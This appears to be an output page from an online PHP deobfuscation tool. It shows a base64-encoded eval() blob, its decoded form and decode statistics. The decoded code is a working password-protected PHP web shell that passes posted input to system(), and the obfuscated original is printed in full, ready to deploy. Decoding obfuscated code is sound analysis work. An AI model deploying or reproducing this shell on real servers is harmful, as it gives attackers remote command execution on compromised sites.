Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval(base64_decode("JHNoZWxsVXNlciA9ICJqb19NY0pSa0hvIjskc2hlbGxNRDUgPSAiYTAzNmUwZmN..
Decoded Output download
$shellUser = "jo_McJRkHo";$shellMD5 = "a036e0fcfd4098677ef51f5ce92439ef"; function clean($data) {
$data = trim($data);
$data = stripslashes($data);
$data = htmlspecialchars($data);
return $data;
}
if (!empty($_POST['user']) && !empty($_POST['p'])) {
$user = clean($_POST['user']);
$password = clean($_POST['p']);
if ($user == $shellUser && md5(sha1($password)) == $shellMD5) {
setcookie("user", $user, time()+21600,'/');
setcookie("t3rr0r", $password, time()+21600,'/');
header("Refresh:0");
}
}
if (!empty($_POST["logout"]) && (isset($_COOKIE['t3rr0r'])) && isset($_COOKIE['user'])) {
unset($_COOKIE['t3rr0r']);
unset($_COOKIE['user']);
setcookie('user', null, -1, '/');
setcookie('t3rr0r', null, -1, '/');
}
if (isset($_COOKIE["t3rr0r"]) && md5(sha1($_COOKIE["t3rr0r"]))==$shellMD5 && isset($_COOKIE["user"]) && $_COOKIE["user"] == $shellUser) {
?>
<form action="" method="post" ><input size=35 type=text name="cmd" placeholder="Enter Command" /><input type=submit value="Submit" style="display:inline;margin-left: 20px" /></form>
<form action="" method="post"><input type=submit value="Logout" name="logout" style="display: inline-block;" /></form>
<?php
if (isset($_POST["cmd"])) {
system($_POST["cmd"]);
}
} else {
?>
<form action="" method="post" ><input size=35 type=text name="user" placeholder="user" /><input size=35 type=password name="p" placeholder="password" /><input type=submit value="Login" style="display:inline;margin-left: 20px" /></form>
<?php
echo 'Unauthorized T';
}
Did this file decode correctly?
Original Code
<?php
eval(base64_decode("JHNoZWxsVXNlciA9ICJqb19NY0pSa0hvIjskc2hlbGxNRDUgPSAiYTAzNmUwZmNmZDQwOTg2Nzdl
ZjUxZjVjZTkyNDM5ZWYiOyAgICBmdW5jdGlvbiBjbGVhbigkZGF0YSkgew0KICAgICAgICAkZGF0
YSA9IHRyaW0oJGRhdGEpOw0KICAgICAgICAkZGF0YSA9IHN0cmlwc2xhc2hlcygkZGF0YSk7DQog
ICAgICAgICRkYXRhID0gaHRtbHNwZWNpYWxjaGFycygkZGF0YSk7DQogICAgICAgIHJldHVybiAk
ZGF0YTsNCiAgICB9DQoNCiAgICBpZiAoIWVtcHR5KCRfUE9TVFsndXNlciddKSAmJiAhZW1wdHko
JF9QT1NUWydwJ10pKSB7DQogICAgICAgICR1c2VyID0gY2xlYW4oJF9QT1NUWyd1c2VyJ10pOw0K
ICAgICAgICAkcGFzc3dvcmQgPSBjbGVhbigkX1BPU1RbJ3AnXSk7DQogICAgICAgIGlmICgkdXNl
ciA9PSAkc2hlbGxVc2VyICYmIG1kNShzaGExKCRwYXNzd29yZCkpID09ICRzaGVsbE1ENSkgew0K
ICAgICAgICAgICAgc2V0Y29va2llKCJ1c2VyIiwgJHVzZXIsIHRpbWUoKSsyMTYwMCwnLycpOw0K
ICAgICAgICAgICAgc2V0Y29va2llKCJ0M3JyMHIiLCAkcGFzc3dvcmQsIHRpbWUoKSsyMTYwMCwn
LycpOw0KICAgICAgICAgICAgaGVhZGVyKCJSZWZyZXNoOjAiKTsNCiAgICAgICAgfQ0KICAgIH0N
Cg0KICAgIGlmICghZW1wdHkoJF9QT1NUWyJsb2dvdXQiXSkgJiYgKGlzc2V0KCRfQ09PS0lFWyd0
M3JyMHInXSkpICYmIGlzc2V0KCRfQ09PS0lFWyd1c2VyJ10pKSB7DQogICAgICAgIHVuc2V0KCRf
Q09PS0lFWyd0M3JyMHInXSk7IA0KICAgICAgICB1bnNldCgkX0NPT0tJRVsndXNlciddKTsgDQog
ICAgICAgIHNldGNvb2tpZSgndXNlcicsIG51bGwsIC0xLCAnLycpOw0KICAgICAgICBzZXRjb29r
aWUoJ3QzcnIwcicsIG51bGwsIC0xLCAnLycpOw0KICAgIH0NCg0KICAgIGlmIChpc3NldCgkX0NP
T0tJRVsidDNycjByIl0pICYmIG1kNShzaGExKCRfQ09PS0lFWyJ0M3JyMHIiXSkpPT0kc2hlbGxN
RDUgJiYgaXNzZXQoJF9DT09LSUVbInVzZXIiXSkgJiYgJF9DT09LSUVbInVzZXIiXSA9PSAkc2hl
bGxVc2VyKSB7DQo/Pg0KICAgICAgICA8Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0IiA+PGlu
cHV0IHNpemU9MzUgdHlwZT10ZXh0IG5hbWU9ImNtZCIgcGxhY2Vob2xkZXI9IkVudGVyIENvbW1h
bmQiIC8+PGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSJTdWJtaXQiIHN0eWxlPSJkaXNwbGF5Omlu
bGluZTttYXJnaW4tbGVmdDogMjBweCIgLz48L2Zvcm0+DQogICAgICAgIDxmb3JtIGFjdGlvbj0i
IiBtZXRob2Q9InBvc3QiPjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0iTG9nb3V0IiBuYW1lPSJs
b2dvdXQiIHN0eWxlPSJkaXNwbGF5OiBpbmxpbmUtYmxvY2s7IiAvPjwvZm9ybT4NCjw/cGhwDQog
ICAgICAgIGlmIChpc3NldCgkX1BPU1RbImNtZCJdKSkgew0KICAgICAgICAgICAgc3lzdGVtKCRf
UE9TVFsiY21kIl0pOw0KICAgICAgICB9DQogICAgfSBlbHNlIHsNCj8+DQogICAgICAgIDxmb3Jt
IGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiID48aW5wdXQgc2l6ZT0zNSB0eXBlPXRleHQgbmFtZT0i
dXNlciIgcGxhY2Vob2xkZXI9InVzZXIiIC8+PGlucHV0IHNpemU9MzUgdHlwZT1wYXNzd29yZCBu
YW1lPSJwIiBwbGFjZWhvbGRlcj0icGFzc3dvcmQiIC8+PGlucHV0IHR5cGU9c3VibWl0IHZhbHVl
PSJMb2dpbiIgc3R5bGU9ImRpc3BsYXk6aW5saW5lO21hcmdpbi1sZWZ0OiAyMHB4IiAvPjwvZm9y
bT4NCjw/cGhwDQogICAgICAgIGVjaG8gJ1VuYXV0aG9yaXplZCBUJzsNCiAgICB9DQo=
"));
?>
Function Calls
base64_decode | 1 |
Stats
MD5 | 01c3635a833def24f180a6fa4cb5c63f |
Eval Count | 1 |
Decode Time | 172 ms |